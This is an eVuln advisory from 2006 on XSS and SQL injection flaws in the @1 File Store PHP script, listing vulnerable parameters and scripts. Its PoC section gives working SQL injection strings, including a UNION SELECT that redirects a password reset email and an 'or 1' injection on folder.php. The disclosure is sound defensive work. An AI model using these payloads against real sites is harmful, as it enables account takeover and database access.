Multiple XSS and SQL Injection in @1 File Store

Summary

Vulnerability
Multiple XSS and SQL Injection in @1 File Store
Discovered
2006.03.11
Last Update
2006.03.21 Exploitation code published
ID
EV0095
CVE
CVE-2006-1277 CVE-2006-1278
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched. Vendor notyfied.
Vendor
n/a
Vulnerable Software
@1 File Store (http://www.upoint.info/cgi/download/)
Version
2006.03.07
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in @1 File Store (http://www.upoint.info/cgi/download/) script.

1. Multiple XSS Vulnerabilities

Vulnerable script: signup.php

Parameters 'real_name', 'email', 'login' are not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.


2. Multiple SQL Injection Vulnerabilities

'id' parameter is not properly sanitized before being used in SQL queries. This can be used to make any SQL query by injecting arbitrary SQL code.

'email' parameter in password.php is also not properly sanitized before being used in SQL query and allows to make any SQL query.

Condition: magic_quotes_gpc = off

Vulnerable scripts:
libs/functions.php
libs/user.php
control/files/edit.php
control/files/delete.php
control/users/edit.php
control/users/delete.php
control/folders/edit.php
control/folders/access.php
control/folders/delete.php
control/groups/edit.php
control/groups/delete.php
confirm.php
download.php
password.php

PoC/Exploit

1. Cross-Site Scripting Example:

URL: http://[host]/filestore/signup.php
Real Name: [XSS]
E-mail: [XSS]
Login: [XSS]


2. SQL Injection Examples:

URL: http://[host]/filestore/password.php
E-mail: 99999' union select 1,2,3,4,5,6,7,8,9,10,'hello','world','[send_to_email]',14,15,16/*

Registered user:
http://[host]/filestore/folder.php?id=999'%20or%201/*

Solution.

Solution for "Multiple XSS and SQL Injection in @1 File Store" is not available. Check vendor's website for updates.